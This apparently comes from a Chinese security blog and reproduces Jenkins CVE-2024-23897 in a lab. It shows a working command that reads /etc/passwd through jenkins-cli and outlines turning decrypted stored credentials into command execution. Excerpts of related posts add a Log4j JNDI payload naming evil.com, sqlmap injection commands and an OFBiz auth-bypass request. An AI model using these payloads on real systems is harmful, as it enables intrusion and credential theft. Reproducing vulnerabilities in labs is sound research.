Jenkins 任意文件读取漏洞-CVE-2024-23897

发表于2024-01-27|更新于2026-06-12|Web安全

|浏览量:

Jenkins 任意文件读取漏洞-CVE-2024-23897

工具获取

官方描述在jenkins的链接后面加上 /jnlpJars/jenkins-cli.jar 即可获取

1	http://192.168.72.129:8080//jnlpJars/jenkins-cli.jar

POC

1	java -jar jenkins-cli.jar -s http://192.168.72.129:8080 connect-node "@/etc/passwd"

如何RCE

需要使用 jenkins解密工具

1	https://github.com/hoto/jenkins-credentials-decryptor

找到 jenkins安装路径找到这三个文件解密会得到账号密码进入后台，即可执行命令
执行命令可以参考 : https://blog.putdown.top/archives/3580484b-3ef1-4194-9d48-bcd4fdf01f92

文章作者: putdown

文章链接: https://blog.putdown.top/archives/573b2cd5.html

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Putdownd’s Blog！

相关推荐

漏洞复现-Apache Shiro 认证绕过漏洞（CVE-2020-1957）

环境: vulhubApache Shiro 认证绕过漏洞（CVE-2020-1957）Apache Shiro是一款开源安全框架，提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用，同时也能提供健壮的安全性。在Apache Shiro 1.5.2以前的版本中，在使用Spring动态控制器时，攻击者通过构造..;这样的跳转，可以绕过Shiro中对目录的权限限制。参考链接： https://github.com/apache/shiro/commit/3708d7907016bf2fa12691dff6ff0def1249b8ce#diff-98f7bc5c0391389e56531f8b3754081aL139 https://xz.aliyun.com/t/8281 https://blog.spoock.com/2020/05/09/cve-2020-1957/ 环境搭建执行如下命令启动一个搭载Spring 2.2.2与Shiro 1.5.1的应用： 1docker-compose up -d 环境启动后，访问http://your-ip:8080即可查...

漏洞复现-Apache Log4j2 lookup JNDI 注入漏洞（CVE-2021-44228)

环境搭建: vulhubApache Log4j2 lookup JNDI 注入漏洞（CVE-2021-44228）中文版本(Chinese version) Apache Log4j 2 是Java语言的日志处理套件，使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞，攻击者在可以控制日志内容的情况下，通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入，执行任意代码。参考链接： https://logging.apache.org/log4j/2.x/security.html https://www.lunasec.io/docs/blog/log4j-zero-day/ https://xz.aliyun.com/t/10649 漏洞环境Apache Log4j2 不是一个特定的Web服务，而仅仅是一个第三方库，我们可以通过找到一些使用了这个库的应用来复现这个漏洞，比如Apache Solr。执行如下命令启动一个Apache Solr 8.11.0，其依赖了Log4j 2.14.1： 1d...

Jenkins未授权访问到Getshell

实验环境 ubuntu20 虚拟机安装 Jenkins安装Java12sudo apt updatesudo apt install openjdk-11-jdk 开始安装Jenkins 使用下面的wget命令，导入 Jenkins 软件源的 GPG keys： 1wget -q -O - https://pkg.jenkins.io/debian/jenkins.io.key | sudo apt-key add - 下一步，添加软件源到系统中： 1sudo sh -c 'echo deb http://pkg.jenkins.io/debian-stable binary/ > /etc/apt/sources.list.d/jenkins.list' 一旦 Jenkins 软件源被启用，升级apt软件包列表，并且安装最新版本的 Jenkins： 12sudo apt updatesudo apt install jenkins Ubuntu安装Jenkins报错解决 1234567891011121314正在读取软件包列...

漏洞复现-骑士cms任意代码执行（CVE-2020-35339）

环境先扫一下后台 123http://192.168.169.233:26889/index.php?m=Admin&c=index&a=login根据靶场提示账号密码都是 adminadmin 漏洞点

HMS v1.0 appointment.php editid

概述面试遇到一个靶场,复盘一下测试环境: vulfocus在线靶场 http://vulfocus.io/ 面试时的测试经过: bp+xray kali 扫目录经面试官提示 sql 注入, 因为此前有类似的界面就直接再下图进行了post注入(注入点不在这) 后在登录界面发现post注入放到sqlmap进行注入,时间结束,没看到结果重新测试面试结束,在xray的报告中发现该靶场的一些信息,重新进行测试靶场信息,面试的时候只知道ip awvs 扫描结果,和靶场描述一致 SQL注入知道主要是sql注入,其他功能就先放弃测试开测接着没测完的接着跑保存http 开跑 1sqlmap -r hms.txt --level 4 --dbs hms 1sqlmap -r hms.txt --level 4 -D hms --tables 看admin 1sqlmap -r hms.txt --level 4 -D hms -T admin --columns 看字段 1qlmap -r hms.txt...

Apache OFBiz - CVE-2023-51467

Apache OFBiz - CVE-2023-51467 复现环境 vulhub 注意服务500报错根据配置文件 security.properties headers 需要包含 Host: localhost，否则报错修改一下请求，正常访问利用poc： 123456789101112131415161718192021POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1Host: localhostCookie: OFBiz.Visitor=10001Pragma: no-cacheCache-Control: no-cacheSec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"Sec-Ch...